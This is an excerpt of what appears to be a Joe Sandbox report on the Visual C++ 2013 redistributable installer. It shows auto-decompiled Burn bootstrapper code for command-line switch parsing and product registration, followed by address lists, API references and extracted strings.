																																										if(_t424 !=  *_t342 || 0 ==  *_t342) {
																																											_t452 = 0x80070057;
																																											E012B294E(_t342, "core.cpp", 0x4e9, 0x80070057);
																																											_push(L"burn.ancestors");
																																											L177:
																																											_push("Missing required parameter for switch: %ls");
																																											_push(_t452);
																																											_v12 = _t452;
																																											E012AFA86();
																																										} else {
																																											_t189 = E012B1171(0, _t440, _a60, _t342, 0);
																																											_v12 = _t189;
																																											if(_t189 >= 0) {
																																												goto L147;
																																											}
																																											_push("Failed to allocate the list of ancestors.");
																																											L133:
																																											_push(_t189);
																																											L134:
																																											E012AFA86();
																																										}
																																										goto L159;
																																									}
																																									_t346 =  *_t450 + 2 + lstrlenW(L"burn.ignoredependencies") * 2;
																																									_t427 = 0x3d;
																																									if(_t427 !=  *_t346 || 0 ==  *_t346) {
																																										_t452 = 0x80070057;
																																										E012B294E(_t346, "core.cpp", 0x4dd, 0x80070057);
																																										_push(L"burn.ignoredependencies");
																																										goto L177;
																																									} else {
																																										_t189 = E012B1171(0, _t440, _a56, _t346, 0);
																																										_v12 = _t189;
																																										if(_t189 >= 0) {
																																											goto L147;
																																										}
																																										_push("Failed to allocate the list of dependencies to ignore.");
																																										goto L133;
																																									}
																																								}
																																								_t348 = _a16;
																																								L47:
																																								 *_t348 = 4;
																																								goto L147;
																																							}
																																							_t197 = _a40;
																																							L63:
																																							 *_t197 = 1;
																																							goto L147;
																																						}
																																						_a4[8] = 1;
																																						goto L147;
																																					}
																																					_push(6);
																																					L112:
																																					_pop(1);
																																					L105:
																																					_a4[7] = 1;
																																					_push(1);
																																					L106:
																																					_push(E01291A96());
																																					_push(0x20000003);
																																					goto L107;
																																				}
																																				_push(4);
																																				goto L112;
																																			}
																																			_push(3);
																																			goto L112;
																																		}
																																		_a4[7] = _t411;
																																		_push(_t411);
																																		goto L106;
																																	}
																																	goto L105;
																																}
																																_t355 = _v8 + 3;
																																if(_v8 + 3 >= _v20) {
																																	_t451 = 0x80070057;
																																	_push(0x80070057);
																																	_push(0x4a1);
																																	L173:
																																	_push("core.cpp");
																																	E012B294E(_t355);
																																	_push("Must specify the embedded name, token and parent process id.");
																																	L174:
																																	_v12 = _t451;
																																	_push(_t451);
																																	goto L134;
																																}
																																 *_a16 = 3;
																																L97:
																																_v8 = _v8 + 1;
																																_t360 = E0128C0FB(_a12, _v8, _t440, _v16 + _v8 * 4);
																																_v12 = _t360;
																																if(_t360 >= 0) {
																																	L89:
																																	_v8 = _v8 + _t411;
																																	goto L147;
																																}
																																_push("Failed to parse embedded connection.");
																																L99:
																																_push(_v12);
																																goto L134;
																															}
																															_t355 = _v8 + 3;
																															if(_v8 + 3 >= _v20) {
																																_t451 = 0x80070057;
																																_push(0x80070057);
																																_push(0x491);
																																goto L173;
																															}
																															 *_a16 = _t411;
																															goto L97;
																														}
																														_t364 = _v8 + 3;
																														if(_v8 + 3 >= _v20) {
																															_t451 = 0x80070057;
																															E012B294E(_t364, "core.cpp", 0x481, 0x80070057);
																															_push("Must specify the unelevated name, token and parent process id.");
																															goto L174;
																														}
																														_v8 = _v8 + 1;
																														 *_a36 = 1;
																														_t369 = E0128C0FB(_a8, _v8, _t440, _v16 + _v8 * 4);
																														_v12 = _t369;
																														if(_t369 >= 0) {
																															goto L89;
																														}
																														_push("Failed to parse unelevated connection.");
																														goto L99;
																													}
																													_t371 = _v8 + 3;
																													if(_v8 + 3 >= _v20) {
																														_t451 = 0x80070057;
																														E012B294E(_t371, "core.cpp", 0x471, 0x80070057);
																														_push("Must specify the elevated name, token and parent process id.");
																														goto L174;
																													}
																													_v8 = _v8 + 1;
																													 *_a36 = 3;
																													_t376 = E0128C0FB(_a8, _v8, _t440, _v16 + _v8 * 4);
																													_v12 = _t376;
																													if(_t376 < 0) {
																														_push("Failed to parse elevated connection.");
																														goto L99;
																													}
																													goto L89;
																												}
																												_t378 = _v8 + 1;
																												if(_t378 >= _v20) {
																													_t451 = 0x80070057;
																													E012B294E(_t378, "core.cpp", 0x463, 0x80070057);
																													_push("Must specify a path for append log.");
																													goto L174;
																												}
																												_v8 = _t378;
																												_t189 = E012B1171(_v16, _t440, _a48,  *((intOrPtr*)(_v16 + _t378 * 4)), 0);
																												_v12 = _t189;
																												if(_t189 < 0) {
																													_push("Failed to copy append log file path.");
																													goto L133;
																												}
																												 *_a44 =  *_a44 | 0x00000001;
																												goto L147;
																											}
																											_t189 = E012B1171(_t419, _t440, _a52, 0x12ba5c8, 0);
																											_v12 = _t189;
																											if(_t189 >= 0) {
																												goto L147;
																											}
																											_push("Failed to initialize parent to none.");
																											goto L133;
																										}
																										_t382 = _v8 + 1;
																										if(_t382 >= _v20) {
																											_t451 = 0x80070057;
																											E012B294E(_t382, "core.cpp", 0x452, 0x80070057);
																											_push("Must specify a value for parent.");
																											goto L174;
																										}
																										_v8 = _t382;
																										_t189 = E012B1171(_v16, _t440, _a52,  *((intOrPtr*)(_v16 + _t382 * 4)), 0);
																										_v12 = _t189;
																										if(_t189 >= 0) {
																											goto L147;
																										}
																										_push("Failed to copy parent.");
																										goto L133;
																									}
																									_t385 = _v8 + 1;
																									if(_t385 >= _v20) {
																										_t451 = 0x80070057;
																										E012B294E(_t385, "core.cpp", 0x447, 0x80070057);
																										_push("Must specify a path for original source.");
																										goto L174;
																									}
																									_v8 = _t385;
																									_t189 = E012B1171(_v16, _t440, _a32,  *((intOrPtr*)(_v16 + _t385 * 4)), 0);
																									_v12 = _t189;
																									if(_t189 >= 0) {
																										goto L147;
																									}
																									_push("Failed to copy last used source.");
																									goto L133;
																								}
																								_t197 = _a28;
																								goto L63;
																							}
																							_t387 = _a4;
																							if( *_t387 != 1) {
																								 *_t387 = 3;
																							}
																							goto L147;
																						}
																						_t388 = _a24;
																						L60:
																						 *_t388 = _t411;
																						goto L147;
																					}
																					_t197 = _a24;
																					goto L63;
																				}
																				_t388 = _a20;
																				if( *_t388 == 0) {
																					goto L147;
																				}
																				goto L60;
																			}
																			 *_a20 =  *_a20 & 0x00000000;
																		}
																		goto L147;
																	}
																	_t390 = _a4;
																	if( *_t390 != 1) {
																		 *_t390 = 6;
																	}
																	goto L147;
																}
																_t391 = _a4;
																if( *_t391 != 1) {
																	 *_t391 = 7;
																}
																goto L147;
															}
															_t348 = _a4;
															if( *_t348 == 1) {
																goto L147;
															}
															goto L47;
														}
														_t392 = _a4;
														if( *_t392 != 1) {
															 *_t392 = _t411;
														}
														_t437 = _v8 + 1;
														if(_t437 >= _v20) {
															goto L147;
														} else {
															_t394 =  *(_t450[1]) & 0x0000ffff;
															if(_t394 == 0x2d || _t394 == 0x2f) {
																goto L147;
															} else {
																_v8 = _t437;
																_t189 = E012B1B10(_t437, _t440,  &(_a4[9]),  *((intOrPtr*)(_v16 + _t437 * 4)), 3);
																_v12 = _t189;
																if(_t189 >= 0) {
																	goto L147;
																}
																_push("Failed to copy path for layout directory.");
																goto L133;
															}
														}
													}
													_a4[2] = _t411;
													goto L147;
												}
												_a4[2] = 4;
												goto L147;
											}
											_a4[2] = 1;
											goto L147;
										}
										_t207 = _a4;
										 *(_t207 + 4) = 3;
										L29:
										if( *(_t207 + 8) == 0) {
											 *(_t207 + 8) = 3;
										}
										goto L147;
									}
								}
							}
						} else {
							L146:
							E012B17A8(_t419,  &(_a4[3]),  *_t450);
						}
						L147:
						_v8 = _v8 + 1;
					} while (_v8 < _v20);
					goto L148;
				} else {
					_t402 = E012B1325(__ecx,  &_v24, L"ignored ", 0);
					_v12 = _t402;
					if(_t402 >= 0) {
						_t402 = E012B1325(__ecx,  &_v24, _t447, 0);
						_v12 = _t402;
						if(_t402 >= 0) {
							_t405 = CommandLineToArgvW(_v24,  &_v20);
							_v16 = _t405;
							if(_t405 != 0) {
								goto L14;
							} else {
								_t406 = GetLastError();
								if(_t406 > 0) {
									_t406 = _t406 & 0x0000ffff | 0x80070000;
								}
								_v12 = _t406;
								if(_t406 >= 0) {
									_v12 = 0x80004005;
								}
								E012B294E(_t406, "core.cpp", 0x3b6, _v12);
								_push("Failed to get command line.");
								_push(_v12);
								goto L5;
							}
						} else {
							_push("Failed to copy command line.");
							goto L4;
						}
					} else {
						_push("Failed to initialize command line.");
						L4:
						_push(_t402);
						L5:
						E012AFA86();
						L161:
						if(_v24 != 0) {
							E012B01E8(_v24);
						}
						return _v12;
					}
				}
			}

0x0128c7ea
0x0128c7f0
0x0128c7f4
0x0128c7f6
0x0128c7f9
0x0128c7fc
0x0128c7ff
0x0128c804
0x0128c8a6
0x0128c8a8
0x0128c8ac
0x0128c8af
0x0128c8b3
0x0128d1bf
0x0128d1bf
0x0128d1c2
0x0128d1c6
0x0128d1c9
0x0128d36e
0x0128d370
0x0128d1e7
0x0128d1e7
0x0128d1ea
0x0128d1ee
0x0128d1f0
0x0128d1f0
0x0128d1f9
0x0128d1fb
0x0128d1fb
0x0128d201
0x0128d206
0x0128d206
0x0128d209
0x0128d20e
0x0128d213
0x0128d213
0x00000000
0x0128d20e
0x0128d376
0x0128d379
0x00000000
0x0128d379
0x0128d1d2
0x0128d1d6
0x0128d1e1
0x00000000
0x00000000
0x00000000
0x00000000
0x0128d1d6
0x0128c8bf
0x0128c8c5
0x0128c8c8
0x0128c8ca
0x0128c8d0
0x0128c8ec
0x0128c8f0
0x0128d16b
0x0128d171
0x0128d175
0x0128d352
0x0128d362
0x0128d367
0x00000000
0x0128d367
0x0128d183
0x0128d189
0x0128d18e
0x0128d193
0x00000000
0x00000000
0x0128d195
0x00000000
0x0128c912
0x0128c928
0x0128d160
0x00000000
0x0128c966
0x0128c97c
0x0128d155
0x0128d158
0x00000000
0x0128c9d6
0x0128c9ec
0x0128ca24
0x0128ca4b
0x0128ca72
0x0128ca95
0x0128cb08
0x0128cb37
0x0128cb66
0x0128cb95
0x0128d145
0x0128d14b
0x0128d14d
0x0128d14d
0x0128cbb7
0x0128cbcd
0x0128cbf0
0x0128cc1b
0x0128cc41
0x0128cc5e
0x0128cc8d
0x0128ccaa
0x0128ccf7
0x0128cd44
0x0128cd80
0x0128cdce
0x0128ce25
0x0128ce77
0x0128cecf
0x0128cf01
0x0128cf3c
0x0128cf5d
0x0128cf7a
0x0128cf96
0x0128cfb2
0x0128cfd9
0x0128cff9
0x0128d008
0x0128d00f
0x0128d02a
0x0128d078
0x0128d07f
0x0128d09a
0x0128d0f3
0x0128d108
0x0128d1a1
0x00000000
0x0128d1a1
0x0128d10e
0x0128d11a
0x0128d11b
0x0128d123
0x0128d128
0x0128d134
0x00000000
0x00000000
0x0128d13a
0x0128d13b
0x0128cf18
0x0128cf18
0x0128cf19
0x0128cf1e
0x00000000
0x0128cf1e
0x0128d0a9
0x0128d0af
0x0128d0b3
0x0128d322
0x0128d332
0x0128d337
0x0128d33c
0x0128d33c
0x0128d341
0x0128d342
0x0128d345
0x0128d0c7
0x0128d0cc
0x0128d0d1
0x0128d0d6
0x00000000
0x00000000
0x0128d0dc
0x0128d0e1
0x0128d0e1
0x0128d0e2
0x0128d0e2
0x0128d0e8
0x00000000
0x0128d0b3
0x0128d039
0x0128d03f
0x0128d043
0x0128d306
0x0128d316
0x0128d31b
0x00000000
0x0128d057
0x0128d05c
0x0128d061
0x0128d066
0x00000000
0x00000000
0x0128d06c
0x00000000
0x0128d06c
0x0128d043
0x0128cffb
0x0128cb16
0x0128cb16
0x00000000
0x0128cb16
0x0128cfdb
0x0128cc20
0x0128cc20
0x00000000
0x0128cc20
0x0128cfb7
0x00000000
0x0128cfb7
0x0128cf98
0x0128cf61
0x0128cf61
0x0128cf06
0x0128cf09
0x0128cf0c
0x0128cf0d
0x0128cf12
0x0128cf13
0x00000000
0x0128cf13
0x0128cf7c
0x00000000
0x0128cf7c
0x0128cf5f
0x00000000
0x0128cf5f
0x0128cf41
0x0128cf44
0x00000000
0x0128cf44
0x00000000
0x0128cf05
0x0128ced4
0x0128ceda
0x0128d2e3
0x0128d2e8
0x0128d2e9
0x0128d2ee
0x0128d2ee
0x0128d2f3
0x0128d2f8
0x0128d2fd
0x0128d2fd
0x0128d300
0x00000000
0x0128d300
0x0128cee3
0x0128ce8d
0x0128ce8d
0x0128ce9c
0x0128cea1
0x0128cea6
0x0128ce07
0x0128ce07
0x00000000
0x0128ce07
0x0128ceac
0x0128ceb1
0x0128ceb1
0x00000000
0x0128ceb1
0x0128ce7c
0x0128ce82
0x0128d2d6
0x0128d2db
0x0128d2dc
0x00000000
0x0128d2dc
0x0128ce8b
0x00000000
0x0128ce8b
0x0128ce2a
0x0128ce30
0x0128d2ba
0x0128d2ca
0x0128d2cf
0x00000000
0x0128d2cf
0x0128ce39
0x0128ce3f
0x0128ce4e
0x0128ce53
0x0128ce58
0x00000000
0x00000000
0x0128ce5a
0x00000000
0x0128ce5a
0x0128cdd3
0x0128cdd9
0x0128d294
0x0128d2a4
0x0128d2a9
0x00000000
0x0128d2a9
0x0128cde2
0x0128cde8
0x0128cdf7
0x0128cdfc
0x0128ce01
0x0128d2b0
0x00000000
0x0128d2b0
0x00000000
0x0128ce01
0x0128cd85
0x0128cd89
0x0128d26e
0x0128d27e
0x0128d283
0x00000000
0x0128d283
0x0128cd97
0x0128cd9d
0x0128cda2
0x0128cda7
0x0128d28a
0x00000000
0x0128d28a
0x0128cdb0
0x00000000
0x0128cdb0
0x0128cd50
0x0128cd55
0x0128cd5a
0x00000000
0x00000000
0x0128cd60
0x00000000
0x0128cd60
0x0128ccfc
0x0128cd00
0x0128d24f
0x0128d25f
0x0128d264
0x00000000
0x0128d264
0x0128cd0e
0x0128cd14
0x0128cd19
0x0128cd1e
0x00000000
0x00000000
0x0128cd24
0x00000000
0x0128cd24
0x0128ccaf
0x0128ccb3
0x0128d230
0x0128d240
0x0128d245
0x00000000
0x0128d245
0x0128ccc1
0x0128ccc7
0x0128cccc
0x0128ccd1
0x00000000
0x00000000
0x0128ccd7
0x00000000
0x0128ccd7
0x0128cc8f
0x00000000
0x0128cc8f
0x0128cc60
0x0128cc66
0x0128cc6c
0x0128cc6c
0x00000000
0x0128cc66
0x0128cc43
0x0128cbfe
0x0128cbfe
0x00000000
0x0128cbfe
0x0128cc1d
0x00000000
0x0128cc1d
0x0128cbf2
0x0128cbf8
0x00000000
0x00000000
0x00000000
0x0128cbf8
0x0128cbd2
0x0128cbd2
0x00000000
0x0128cb95
0x0128cb68
0x0128cb6e
0x0128cb74
0x0128cb74
0x00000000
0x0128cb6e
0x0128cb39
0x0128cb3f
0x0128cb45
0x0128cb45
0x00000000
0x0128cb3f
0x0128cb0a
0x0128cb10
0x00000000
0x00000000
0x00000000
0x0128cb10
0x0128ca97
0x0128ca9d
0x0128ca9f
0x0128ca9f
0x0128caa4
0x0128caa8
0x00000000
0x0128caae
0x0128cab1
0x0128cab7
0x00000000
0x0128cac6
0x0128cad5
0x0128cad8
0x0128cadd
0x0128cae2
0x00000000
0x00000000
0x0128cae8
0x00000000
0x0128cae8
0x0128cab7
0x0128caa8
0x0128ca77
0x00000000
0x0128ca77
0x0128ca50
0x00000000
0x0128ca50
0x0128ca29
0x00000000
0x0128ca29
0x0128c9ee
0x0128c9f1
0x0128c9f8
0x0128c9fc
0x0128ca02
0x0128ca02
0x00000000
0x0128c9fc
0x0128c97c
0x0128c928
0x0128d1a2
0x0128d1a2
0x0128d1ab
0x0128d1ab
0x0128d1b0
0x0128d1b0
0x0128d1b6
0x00000000
0x0128c813
0x0128c81d
0x0128c822
0x0128c827
0x0128c841
0x0128c846
0x0128c84b
0x0128c85b
0x0128c861
0x0128c866
0x00000000
0x0128c868
0x0128c868
0x0128c870
0x0128c877
0x0128c877
0x0128c87c
0x0128c881
0x0128c883
0x0128c883
0x0128c897
0x0128c89c
0x0128c8a1
0x00000000
0x0128c8a1
0x0128c84d
0x0128c84d
0x00000000
0x0128c84d
0x0128c829
0x0128c829
0x0128c82e
0x0128c82e
0x0128c82f
0x0128c82f
0x0128d219
0x0128d21f
0x0128d224
0x0128d224
0x0128d22d
0x0128d22d
0x0128c827

APIs

CommandLineToArgvW.SHELL32(01282142,01282146,01282142,?,00000000,01282142,ignored ,00000000,00000000,01281D56,01282142,01282146,01281E8E,01282222,01281F0E,00000000), ref: 0128C85B
GetLastError.KERNEL32 ref: 0128C868
CompareStringW.KERNELBASE(0000007F,00000001,01281E8C,000000FF,012C1B8C,000000FF,012821DE,00000000,01281D56,01282142,01282146,01281E8E,01282222,01281F0E,00000000,?), ref: 0128C8EC
CompareStringW.KERNEL32(0000007F,00000001,00000000,000000FF,log,000000FF), ref: 0128C908
CompareStringW.KERNEL32(0000007F,00000001,00000000,000000FF,012C1B80,000000FF), ref: 0128C924
CompareStringW.KERNEL32(0000007F,00000001,00000000,000000FF,012C1B7C,000000FF), ref: 0128C940
CompareStringW.KERNEL32(0000007F,00000001,00000000,000000FF,help,000000FF), ref: 0128C95C
CompareStringW.KERNEL32(0000007F,00000001,00000000,000000FF,012C1B6C,000000FF), ref: 0128C978
CompareStringW.KERNEL32(0000007F,00000001,00000000,000000FF,quiet,000000FF), ref: 0128C994
CompareStringW.KERNEL32(0000007F,00000001,00000000,000000FF,012C1B5C,000000FF), ref: 0128C9B0
CompareStringW.KERNEL32(0000007F,00000001,00000000,000000FF,silent,000000FF), ref: 0128C9CC
CompareStringW.KERNEL32(0000007F,00000001,00000000,000000FF,passive,000000FF), ref: 0128C9E8
CompareStringW.KERNEL32(0000007F,00000001,00000000,000000FF,norestart,000000FF), ref: 0128CA20
CompareStringW.KERNEL32(0000007F,00000001,00000000,000000FF,forcerestart,000000FF), ref: 0128CA47
CompareStringW.KERNEL32(0000007F,00000001,00000000,000000FF,promptrestart,000000FF), ref: 0128CA6E
CompareStringW.KERNEL32(0000007F,00000001,00000000,000000FF,layout,000000FF), ref: 0128CA91
lstrlenW.KERNEL32(00000000), ref: 0128D0F3
lstrlenW.KERNEL32(burn.), ref: 0128D100
lstrlenW.KERNEL32(burn.), ref: 0128D114
lstrlenW.KERNEL32(burn.,burn.,00000000), ref: 0128D11D
CompareStringW.KERNEL32(0000007F,00000001,00000000,00000000), ref: 0128D130
LocalFree.KERNEL32(00000000,00000000,01281D56,01282142,01282146), ref: 0128D213

Strings

Must specify the unelevated name, token and parent process id., xrefs: 0128D2CF
core.cpp, xrefs: 0128C892, 0128D23B, 0128D25A, 0128D279, 0128D29F, 0128D2C5, 0128D2EE, 0128D311, 0128D32D, 0128D35D
package, xrefs: 0128CB83
burn.related.addon, xrefs: 0128CF4B
burn.disable.unelevate, xrefs: 0128CFC7
disablesystemrestore, xrefs: 0128CC7B
Failed to allocate the list of ancestors., xrefs: 0128D0DC
burn.related.upgrade, xrefs: 0128CF2A
burn., xrefs: 0128D0F9, 0128D10E, 0128D113, 0128D11B, 0128D11C
burn.elevated, xrefs: 0128CDBC
Must specify the embedded name, token and parent process id., xrefs: 0128D2F8
Must specify a path for append log., xrefs: 0128D283
uninstall, xrefs: 0128CAF6
burn.embedded.async, xrefs: 0128CEBD
keepaupaused, xrefs: 0128CBDE
help, xrefs: 0128C94E
parent, xrefs: 0128CCE5
log, xrefs: 0128C8FA
burn.ignoredependencies, xrefs: 0128D003, 0128D00F, 0128D014, 0128D015, 0128D02C, 0128D31B
burn.related.patch, xrefs: 0128CF68
Failed to parse unelevated connection., xrefs: 0128CE5A
quiet, xrefs: 0128C986
norestart, xrefs: 0128CA12
burn.runonce, xrefs: 0128CFE7
Failed to copy path for layout directory., xrefs: 0128CAE8
forcerestart, xrefs: 0128CA39
noaupause, xrefs: 0128CBBB
Must specify a path for log., xrefs: 0128D367
Failed to copy parent., xrefs: 0128CD24
Failed to initialize command line., xrefs: 0128C829
burn.log.append, xrefs: 0128CD6E
Failed to copy log file path., xrefs: 0128D195
burn.passthrough, xrefs: 0128CFA0
silent, xrefs: 0128C9BE
serialcacheandexecute, xrefs: 0128CC2F
Must specify the elevated name, token and parent process id., xrefs: 0128D2A9
Failed to initialize parent to none., xrefs: 0128CD60
Must specify a value for parent., xrefs: 0128D264
Failed to allocate the list of dependencies to ignore., xrefs: 0128D06C
burn.ancestors, xrefs: 0128D073, 0128D07F, 0128D084, 0128D085, 0128D09C, 0128D337
Failed to parse embedded connection., xrefs: 0128CEAC
burn.related.detect, xrefs: 0128CEEF
parent:none, xrefs: 0128CD32
parallelcacheandexecute, xrefs: 0128CC09
update, xrefs: 0128CB9F
Failed to parse elevated connection., xrefs: 0128D2B0
Failed to copy append log file path., xrefs: 0128D28A
cache, xrefs: 0128CC4C
burn.related.update, xrefs: 0128CF84
Failed to get command line., xrefs: 0128C89C
Failed to copy command line., xrefs: 0128C84D
burn.unelevated, xrefs: 0128CE13
originalsource, xrefs: 0128CC98
repair, xrefs: 0128CB25
modify, xrefs: 0128CB54
ignored , xrefs: 0128C814
burn.embedded, xrefs: 0128CE65
Failed to copy last used source., xrefs: 0128CCD7
passive, xrefs: 0128C9DA
promptrestart, xrefs: 0128CA60
layout, xrefs: 0128CA83
Missing required parameter for switch: %ls, xrefs: 0128D33C
Must specify a path for original source., xrefs: 0128D245

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CompareString$lstrlen$ArgvCommandErrorFreeLastLineLocal
String ID: Failed to allocate the list of ancestors.$Failed to allocate the list of dependencies to ignore.$Failed to copy append log file path.$Failed to copy command line.$Failed to copy last used source.$Failed to copy log file path.$Failed to copy parent.$Failed to copy path for layout directory.$Failed to get command line.$Failed to initialize command line.$Failed to initialize parent to none.$Failed to parse elevated connection.$Failed to parse embedded connection.$Failed to parse unelevated connection.$Missing required parameter for switch: %ls$Must specify a path for append log.$Must specify a path for log.$Must specify a path for original source.$Must specify a value for parent.$Must specify the elevated name, token and parent process id.$Must specify the embedded name, token and parent process id.$Must specify the unelevated name, token and parent process id.$burn.$burn.ancestors$burn.disable.unelevate$burn.elevated$burn.embedded$burn.embedded.async$burn.ignoredependencies$burn.log.append$burn.passthrough$burn.related.addon$burn.related.detect$burn.related.patch$burn.related.update$burn.related.upgrade$burn.runonce$burn.unelevated$cache$core.cpp$disablesystemrestore$forcerestart$help$ignored $keepaupaused$layout$log$modify$noaupause$norestart$originalsource$package$parallelcacheandexecute$parent$parent:none$passive$promptrestart$quiet$repair$serialcacheandexecute$silent$uninstall$update
API String ID: 1440157973-175168873
Opcode ID: 080aad3d8e62b1fe902e1a236d777bc7fcbd7b81282403daee6ae2be6b0c75cc
Instruction ID: 685617fdad2c32b9c444ecb567eda11d473b0170a1c360eec3fda473b9b88fd4
Opcode Fuzzy Hash: 080aad3d8e62b1fe902e1a236d777bc7fcbd7b81282403daee6ae2be6b0c75cc
Instruction Fuzzy Hash: FF72877077520AFBDB11AE98CC82FB977A4EF01B74F244329F660EB2D1D6B099548B50

Uniqueness

Uniqueness Score: -1.00%

Function 01286217 Relevance: 112.4, APIs: 3, Strings: 61, Instructions: 434
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			E01286217(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				void* _v12;
				short* _v16;
				void* _v20;
				void* __edi;
				void* __esi;
				void* _t109;
				intOrPtr* _t110;
				intOrPtr* _t111;
				intOrPtr* _t112;
				int _t155;
				void* _t161;
				void* _t167;
				void* _t168;
				void* _t177;
				void* _t179;
				intOrPtr _t181;

				_t167 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				_t168 = E012B4EA7(_a8, L"Registration",  &_v12);
				if(_t168 == 1) {
					_t168 = 0x80070490;
				}
				if(_t168 >= 0) {
					_t181 = _a4;
					if(E012B540B(_v12, L"Id", _t181 + 0x10) >= 0) {
						if(E012B540B(_v12, L"Tag", _t181 + 0x14) >= 0) {
							if(E01285BBD(_t181, _a8) >= 0) {
								if(E012B540B(_v12, L"Version",  &_v16) >= 0) {
									if(E012B5D5F(_t161, _t167, _v16, 0, _t181 + 0x38) >= 0) {
										if(E012B540B(_v12, L"ProviderKey", _t181 + 0x44) >= 0) {
											if(E012B540B(_v12, L"ExecutableName", _t181 + 0x48) >= 0) {
												if(E012B54DD(_t161, _v12, L"PerMachine", _t181) >= 0) {
													_t177 = E012B4EA7(_v12, L"Arp",  &_v8);
													if(_t177 == 1) {
														L72:
														if(E012858D0(_t177, _v12, _t181 + 0x94, _t181 + 0x98) >= 0) {
															_t179 = E012B4EA7(_v12, L"Update",  &_v20);
															if(_t179 == 1) {
																L89:
																_t109 = E01285AA7(_t181, _t161, _t167); // executed
																_t179 = _t109;
																if(_t179 >= 0) {
																	goto L92;
																}
																_push("Failed to set registration paths.");
																goto L91;
															}
															if(_t179 >= 0) {
																 *(_t181 + 0x9c) = 1;
																_t179 = E012B540B(_v20, L"Manufacturer", _t181 + 0xa0);
																if(_t179 >= 0) {
																	_t179 = E012B540B(_v20, L"Department", _t181 + 0xa4);
																	if(_t179 == 0x80070490 || _t179 >= 0) {
																		_t179 = E012B540B(_v20, L"ProductFamily", _t181 + 0xa8);
																		if(_t179 == 0x80070490 || _t179 >= 0) {
																			_t179 = E012B540B(_v20, L"Name", _t181 + 0xac);
																			if(_t179 >= 0) {
																				_t179 = E012B540B(_v20, L"Classification", _t181 + 0xb0);
																				if(_t179 >= 0) {
																					goto L89;
																				}
																				_push("Failed to get @Classification.");
																				goto L91;
																			}
																			_push("Failed to get @Name.");
																		} else {
																			_push("Failed to get @ProductFamily.");
																		}
																	} else {
																		_push("Failed to get @Department.");
																	}
																	goto L91;
																}
																_push("Failed to get @Manufacturer.");
																goto L91;
															}
															_push("Failed to select Update node.");
															goto L91;
														}
														_push("Failed to parse software tag.");
														goto L91;
													}
													if(_t177 >= 0) {
														_t179 = E012B54DD(_t161, _v8, L"Register", _t181 + 4);
														if(_t179 >= 0) {
															_t179 = E012B540B(_v8, L"DisplayName", _t181 + 0x60);
															if(_t179 == 0x80070490 || _t179 >= 0) {
																_t179 = E012B540B(_v8, L"DisplayVersion", _t181 + 0x64);
																if(_t179 == 0x80070490 || _t179 >= 0) {
																	_t179 = E012B540B(_v8, L"Publisher", _t181 + 0x68);
																	if(_t179 == 0x80070490 || _t179 >= 0) {
																		_t179 = E012B540B(_v8, L"HelpLink", _t181 + 0x6c);
																		if(_t179 == 0x80070490 || _t179 >= 0) {
																			_t179 = E012B540B(_v8, L"HelpTelephone", _t181 + 0x70);
																			if(_t179 == 0x80070490 || _t179 >= 0) {
																				_t179 = E012B540B(_v8, L"AboutUrl", _t181 + 0x74);
																				if(_t179 == 0x80070490 || _t179 >= 0) {
																					_t179 = E012B540B(_v8, L"UpdateUrl", _t181 + 0x78);
																					if(_t179 == 0x80070490 || _t179 >= 0) {
																						_t179 = E012B540B(_v8, L"ParentDisplayName", _t181 + 0x7c);
																						if(_t179 == 0x80070490 || _t179 >= 0) {
																							_t179 = E012B540B(_v8, L"Comments", _t181 + 0x80);
																							if(_t179 == 0x80070490 || _t179 >= 0) {
																								_t179 = E012B540B(_v8, L"Contact", _t181 + 0x84);
																								if(_t179 == 0x80070490 || _t179 >= 0) {
																									_t179 = E012B540B(_v8, L"DisableModify",  &_v16);
																									if(_t179 < 0) {
																										if(_t179 == 0x80070490) {
																											_t179 = 0;
																											 *(_t181 + 0x88) = 0;
																										}
																										L66:
																										if(_t179 >= 0) {
																											_t177 = E012B54DD(_t161, _v8, L"DisableRemove", _t181 + 0x90);
																											if(_t177 == 0x80070490) {
																												goto L72;
																											}
																											if(_t177 >= 0) {
																												 *(_t181 + 0x8c) = 1;
																												goto L72;
																											}
																											_push("Failed to get @DisableRemove.");
																											goto L91;
																										}
																										_push("Failed to get @DisableModify.");
																										goto L91;
																									}
																									_t155 = CompareStringW(0x7f, 0, _v16, 0xffffffff, L"button", 0xffffffff);
																									if(_t155 != 2) {
																										if(CompareStringW(0x7f, 0, _v16, 0xffffffff, L"yes", 0xffffffff) != 2) {
																											if(CompareStringW(0x7f, 0, _v16, 0xffffffff, L"no", 0xffffffff) != 2) {
																												_t179 = 0x8000ffff;
																												E012B294E(_t157, "registration.cpp", 0xf6, 0x8000ffff);
																												_push(_v16);
																												_push("Invalid modify disabled type: %ls");
																												L63:
																												_push(_t179);
																												E012AFA86();
																												goto L92;
																											}
																											 *(_t181 + 0x88) =  *(_t181 + 0x88) & 0x00000000;
																											goto L66;
																										}
																										 *(_t181 + 0x88) = 1;
																										goto L66;
																									}
																									 *(_t181 + 0x88) = _t155;
																									goto L66;
																								} else {
																									_push("Failed to get @Contact.");
																									goto L91;
																								}
																							} else {
																								_push("Failed to get @Comments.");
																								goto L91;
																							}
																						} else {
																							_push("Failed to get @ParentDisplayName.");
																							goto L91;
																						}
																					} else {
																						_push("Failed to get @UpdateUrl.");
																						goto L91;
																					}
																				} else {
																					_push("Failed to get @AboutUrl.");
																					goto L91;
																				}
																			} else {
																				_push("Failed to get @HelpTelephone.");
																				goto L91;
																			}
																		} else {
																			_push("Failed to get @HelpLink.");
																			goto L91;
																		}
																	} else {
																		_push("Failed to get @Publisher.");
																		goto L91;
																	}
																} else {
																	_push("Failed to get @DisplayVersion.");
																	goto L91;
																}
															} else {
																_push("Failed to get @DisplayName.");
																goto L91;
															}
														}
														_push("Failed to get @Register.");
														goto L91;
													}
